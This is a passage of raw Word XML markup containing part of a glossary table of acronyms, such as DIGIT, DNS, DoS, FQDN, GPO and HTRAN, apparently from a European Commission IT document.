              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DIGIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1489D4CF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Directorate General for Digital Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7BE2515F" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05E02157" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="026BC7F2" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Domain Name System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="04F6A847" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3458AE23" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="491D529A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6A8A008D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="05A26677" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DTD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42419F53" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Document Type Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="3EE3EAE7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B44136A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0DA99C75" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>European Commission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="165E136A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48B774D0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ecosystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="410921AF" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A group of interconnected information technology resources that can function as a unit. At the EC this is commonly referred to as an IS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4620E5C8" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="321B7F02" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63E43DBA" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Enterprise Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="02A8C8EE" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="771C01FE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08857366" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extract, Transform, and Load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="32C9F2DC" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="203100C5" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="12F742CA" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>European Union</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="152ED9E6" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0876B399" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4CD4A79C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>European Union Institutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="332A7FBB" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="416A184F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E335AAE" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Front Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="73608A19" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0072FD75" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="567220C8" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fully Qualified Domain Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="3A3168F7" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="599EC689" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B334D83" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>File Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="422882BA" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1494A56C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="259AE3F9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTP Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="1EFFEF5C" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="272BE70C" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>GCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A4B8A27" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Google Cloud Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="584249A6" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B8E5331" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E1A7688" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Group Policy Objects </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="36F6BEB6" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02104418" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4510F794" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Graphical User Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6DB9D284" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32FF23B6" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HBSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0109BD8F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Host Based Security System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7AB6D9B5" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CCDFB4F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTRAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="552EAD2F" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HUC Packet Transmit Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4796DC44" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53CAFBB3" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
